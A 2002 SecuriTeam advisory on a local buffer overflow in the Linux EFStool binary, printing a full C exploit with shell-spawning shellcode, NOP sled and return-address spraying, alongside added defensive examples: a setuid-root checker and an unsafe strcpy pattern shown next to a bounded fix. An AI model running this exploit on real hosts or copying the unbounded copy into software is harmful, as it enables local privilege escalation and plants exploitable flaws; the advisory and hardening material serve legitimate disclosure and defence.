[EXPL] EFStool Local Root Exploit for Linux/x86
From: support@securiteam.com  Date: 09/12/02
From: support@securiteam.com To: list@securiteam.com Date: Thu, 12 Sep 2002 08:24:05 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
EFStool Local Root Exploit for Linux/x86
------------------------------------------------------------------------
SUMMARY
EFStool has been found to contain a buffer overflow that allows a local
attacker to make it execute arbitrary code. The vulnerability can be tested
for with the exploit code below. Note that EFStool is not setuid by default
on the major Linux distributions, so the overflow only yields the invoking
user's own privileges unless an administrator has made the binary +s.
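The advisory's impact hinges on whether the efstool binary is actually setuid root on a given host. The following check is an added example written for this page, not code from the advisory or from EFStool; it reports whether a path carries the setuid bit and whether the owner is uid 0, and it defaults to the install path the exploit uses, which is assumed to be where efstool lives on the audited system.

```c
#define _XOPEN_SOURCE 700
/* Added example (not part of the SecuriTeam advisory): report whether a
 * binary is setuid, and whether it is setuid *root*, which is the case that
 * would turn the efstool overflow into a local root issue. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Returns 1 if the file at path has the setuid bit, 0 if not, -1 on error. */
int is_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* Returns 1 if the file is setuid AND owned by uid 0, 0 otherwise, -1 on error. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return ((st.st_mode & S_ISUID) && st.st_uid == 0) ? 1 : 0;
}

/* Self-check on a constructed temporary file: flips the setuid bit on and
 * off and verifies the detector follows it. Returns 1 on success, 0 on failure. */
int setuid_check_selftest(void)
{
    char tmpl[] = "/tmp/efstool-audit-XXXXXX";   /* constructed scratch file */
    int fd = mkstemp(tmpl);
    int ok = 0;
    if (fd < 0)
        return 0;
    close(fd);
    if (chmod(tmpl, 0755) == 0 && is_setuid(tmpl) == 0 &&
        chmod(tmpl, 04755) == 0 && is_setuid(tmpl) == 1)
        ok = 1;
    unlink(tmpl);
    return ok;
}

int main(int argc, char *argv[])
{
    /* assumption: this is the install path on the audited host */
    const char *path = argc > 1 ? argv[1] : "/opt/gnome/bin/efstool";
    int s = is_setuid(path), r = is_setuid_root(path);
    if (s < 0) {
        perror(path);
        return 1;
    }
    printf("%s: setuid=%d setuid-root=%d\n", path, s, r);
    return 0;
}
```

Run it as `./setuid-check /opt/gnome/bin/efstool`; a result of `setuid-root=0` means the overflow described here cannot escalate beyond the caller's own uid on that host.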
DETAILS
Exploit:
/* efstool.c - efstool/bof simple overflow in efstool,
 *
 * This code is published property of CloudAss, you may
 * duplicate this in any shape or form without prior written
 * permission from CloudAss.
 *
 * Bug discovered by ntfx, just figured I'd code a decent
 * exploit for it.
 *
 * DISCLAIMER - I am in no way affiliated with ntfx or any members of
 * soldierx or legion2002 security.
 *
 * Usage: ./efsroot offset - bruteforce if necessary
 *
 * Bug is pretty stupid, and simple, I have yet to see it give root.
 * efstool is not +s on slackware 8.0 , it should spawn a shell
 * regardless.
 *
 * (C) COPYRIGHT CloudAss , 2002
 * all rights reserved
 ***********************************************************************
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>       /* execl() */

#define SIZE 3000
#define NOP  0x90
#define PATH "/opt/gnome/bin/efstool"

//--------------------------------------------------
/* current stack pointer, base for the return-address guess (x86-32 only) */
long get_esp(void)
{
    long esp;
    __asm__("movl %%esp, %0" : "=r"(esp));
    return esp;
}
//--------------------------------------------------

char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/bash";

int main(int argc, char *argv[])
{
    char buffer[SIZE];
    long retaddr, offset;
    int i;

    if (argc < 2) {
        fprintf(stderr, "usage: %s offset\n", argv[0]);
        return 1;
    }
    offset  = atoi(argv[1]);
    retaddr = get_esp() + offset;

    /* fill the whole buffer with the guessed return address */
    for (i = 0; i < SIZE; i += 4)
        *(long *)&buffer[i] = retaddr;
    /* NOP sled, then the shellcode right behind it */
    for (i = 0; i < strlen(shellcode); i++)
        *(buffer + i) = NOP;
    memcpy(buffer + i, shellcode, strlen(shellcode));
    buffer[SIZE - 1] = '\0';   /* terminate so execl sees a proper string */

    /* the argument list must end with a NULL pointer, not an integer */
    execl(PATH, "efstool", buffer, (char *)NULL);
    perror("execl");
    return 1;
}
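The exploit above works because efstool copies its command-line argument into a fixed-size stack buffer without checking the length, so a 3000-byte argument runs over the saved return address. The following is an added example, not the advisory's code and not EFStool's source (which the page does not quote): a reconstruction of that bug class beside the bounded form that defeats it. The buffer size and the name `parse_target` are assumptions chosen for illustration.

```c
/* Added example (not part of the advisory, not efstool's source): the
 * unbounded argv copy the exploit relies on, next to a bounded version. */
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 256   /* assumed buffer size for illustration */

/* Vulnerable pattern: copies argv data into a fixed stack buffer with no
 * length check. An argument longer than the buffer runs past it into the
 * saved return address, which is what the retaddr spraying above counts on.
 * Kept only to show the shape of the bug; never call it with untrusted input. */
void parse_target_vulnerable(const char *arg)
{
    char name[NAME_MAX_LEN];
    strcpy(name, arg);   /* no bound: overflow when strlen(arg) >= NAME_MAX_LEN */
    printf("target: %s\n", name);
}

/* Hardened copy: refuse oversize input instead of truncating it, so it
 * never reaches the copy at all. memchr is bounded by dstlen, so even an
 * unterminated src cannot be scanned past that many bytes. Returns 0 on
 * success, -1 if src (with its NUL) does not fit in dst. */
int copy_arg_bounded(char *dst, size_t dstlen, const char *src)
{
    const char *end = memchr(src, '\0', dstlen);
    if (end == NULL)
        return -1;               /* no terminator within dstlen: too long */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Same entry point written against the bounded copy. Returns 0 if the
 * argument was accepted, -1 if it was rejected as too long. */
int parse_target_hardened(const char *arg)
{
    char name[NAME_MAX_LEN];
    if (copy_arg_bounded(name, sizeof name, arg) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", NAME_MAX_LEN - 1);
        return -1;
    }
    printf("target: %s\n", name);
    return 0;
}

/* Builds an oversize argument of the size the exploit sends (3000 bytes,
 * here plain 'A's rather than addresses and shellcode; constructed input)
 * and checks that the hardened parser refuses it while a normal-length
 * name is accepted. Returns 1 if both outcomes are as expected. */
int hardened_parser_selftest(void)
{
    static char big[3001];
    memset(big, 'A', 3000);
    big[3000] = '\0';
    return parse_target_hardened("gnome") == 0 &&
           parse_target_hardened(big) == -1;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <name>\n", argv[0]);
        return 1;
    }
    return parse_target_hardened(argv[1]) == 0 ? 0 : 2;
}
```

Rejecting rather than truncating keeps the behaviour explicit: a silently shortened argument can still be a logic bug, whereas a refused one fails loudly. Building with `-fstack-protector-strong` and `-D_FORTIFY_SOURCE=2` adds a second line of defence against the vulnerable variant, but the bounded copy is the actual fix.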
ADDITIONAL INFORMATION
The information has been provided by Cloudass <mailto:cloudass@kernel.net>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.